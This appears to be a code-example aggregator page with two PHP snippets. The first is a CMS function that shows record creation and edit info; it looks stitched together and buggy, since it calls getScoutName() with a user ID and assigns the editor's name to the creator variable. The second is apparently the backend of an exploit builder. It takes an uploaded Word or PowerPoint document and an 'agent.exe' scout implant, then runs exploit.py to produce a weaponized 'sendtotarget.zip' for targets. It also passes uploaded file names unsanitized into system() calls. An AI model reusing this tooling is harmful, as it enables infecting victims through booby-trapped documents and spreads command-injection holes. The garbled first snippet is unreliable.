예제 #1
0
/**
 * Creates a html fragment with information about user and time when the recordset was created
 * and when it was at last edited. Therefore all necessary data must be set in the function
 * parameters. If userid is not set then the function will show @b deleted @b user.
 * @param int     $userIdCreated   Id of the user who create the recordset.
 * @param string  $timestampCreate Date and time of the moment when the user create the recordset.
 * @param int     $userIdEdited    Id of the user last changed the recordset.
 * @param string  $timestampEdited Date and time of the moment when the user last changed the recordset
 * @return string Returns a html string with usernames who creates item and edit item the last time
 */
function admFuncShowCreateChangeInfoById($userIdCreated, $timestampCreate, $userIdEdited, $timestampEdited)
{
    global $gDb, $gProfileFields, $gL10n, $gPreferences;
    // only show info if system setting is activated
    if ($gPreferences['system_show_create_edit'] > 0) {
        $htmlCreateName = '';
        $htmlEditName = '';
        // compose name of user who create the recordset
        if (strlen($timestampCreate) > 0) {
            if ($userIdCreated > 0) {
                $userCreate = new User($gDb, $gProfileFields, $userIdCreated);
                if ($gPreferences['system_show_create_edit'] == 1) {
                    $htmlCreateName = getScoutName($userIdCreated);
                } else {
                    $htmlCreateName = $userCreate->getValue('usr_login_name');
                }
            } else {
                $htmlCreateName = $gL10n->get('SYS_DELETED_USER');
            }
        }
        // compose name of user who edit the recordset
        if (strlen($timestampEdited) > 0) {
            if ($userIdEdited > 0) {
                $userEdit = new User($gDb, $gProfileFields, $userIdEdited);
                if ($gPreferences['system_show_create_edit'] == 1) {
                    $htmlCreateName = getScoutName($userIdEdited);
                } else {
                    $htmlEditName = $userEdit->getValue('usr_login_name');
                }
            } else {
                $htmlEditName = $gL10n->get('SYS_DELETED_USER');
            }
        }
        if ($htmlCreateName !== '' || $htmlEditName !== '') {
            // get html output from other function
            return admFuncShowCreateChangeInfoByName($htmlCreateName, $timestampCreate, $htmlEditName, $timestampEdited, $userIdCreated, $userIdEdited);
        }
    }
    return '';
}
예제 #2
0
#if(!isset($_POST['directory'])) die('Directory not specified');
if (!mkdir('../files/' . $rand_directory)) {
    die('Unable to create directory');
}
if (!mkdir('../files/' . $rand_directory . "/cnt")) {
    die('Unable to create directory');
}
$cwd = getcwd();
chdir("/var/www/html/admin/2013-002-Word");
move_uploaded_file($_FILES['original']['tmp_name'], "/var/www/html/admin/2013-002-Word/original.docx");
move_uploaded_file($_FILES['scout']['tmp_name'], "/var/www/html/admin/2013-002-Word/agent.exe");
$urlbase = 'http://' . $_SERVER['SERVER_NAME'] . '/documents/' . $rand_directory . '/';
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") {
    $scout_name = "demo.exe";
} else {
    $scout_name = getScoutName("/var/www/html/admin/2013-002-Word/agent.exe");
}
if ($scout_name == "") {
    die('Unable to get scout name! :(');
}
mkdir("/tmp/{$rand_directory}");
copy("original.docx", $_FILES['original']['name']);
system("zip /tmp/{$rand_directory}/original.zip \"" . $_FILES['original']['name'] . "\" > /dev/null 2>&1");
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") {
    system("python26 exploit_demo.py payload:http {$urlbase} sendtotarget.zip original.docx \"" . $_FILES['original']['name'] . "\" agent.exe server.zip \"{$scout_name}\" DEMO > /tmp/py.log 2>&1");
} else {
    system("python26 exploit.py payload:http {$urlbase} sendtotarget.zip original.docx \"" . $_FILES['original']['name'] . "\" agent.exe server.zip \"{$scout_name}\" > /tmp/py.log 2>&1");
}
#mkdir("/tmp/$rand_directory");
#copy("original.docx", "\"".$_FILES['original']['name']."\"");
#system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" >/dev/null 2>&1");
#if(!isset($_POST['directory'])) die('Directory not specified');
if (!mkdir('../files/' . $rand_directory)) {
    die('Unable to create directory');
}
if (!mkdir('../files/' . $rand_directory . "/cnt")) {
    die('Unable to create directory');
}
$cwd = getcwd();
chdir("/var/www/html/admin/2013-003-PowerPoint");
move_uploaded_file($_FILES['original']['tmp_name'], "/var/www/html/admin/2013-003-PowerPoint/original.ppsx");
move_uploaded_file($_FILES['scout']['tmp_name'], "/var/www/html/admin/2013-003-PowerPoint/agent.exe");
$urlbase = 'http://' . $_SERVER['SERVER_NAME'] . '/documents/' . $rand_directory . '/';
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") {
    $scout_name = "demo.exe";
} else {
    $scout_name = getScoutName("/var/www/html/admin/2013-003-PowerPoint/agent.exe");
}
if ($scout_name == "") {
    die('Unable to get scout name! :(');
}
mkdir("/tmp/{$rand_directory}");
copy("original.ppsx", $_FILES['original']['name']);
system("zip /tmp/{$rand_directory}/original.zip \"" . $_FILES['original']['name'] . "\" > /dev/null 2>&1");
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") {
    system("python26 exploit_demo.py payload:http {$urlbase} sendtotarget.zip original.ppsx \"" . $_FILES['original']['name'] . "\" agent.exe server.zip \"{$scout_name}\" DEMO > /tmp/py.log 2>&1");
} else {
    system("python26 exploit.py payload:http {$urlbase} sendtotarget.zip original.ppsx \"" . $_FILES['original']['name'] . "\" agent.exe server.zip \"{$scout_name}\" > /tmp/py.log 2>&1");
}
#mkdir("/tmp/$rand_directory");
#copy("original.ppsx", "\"".$_FILES['original']['name']."\"");
#system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" >/dev/null 2>&1");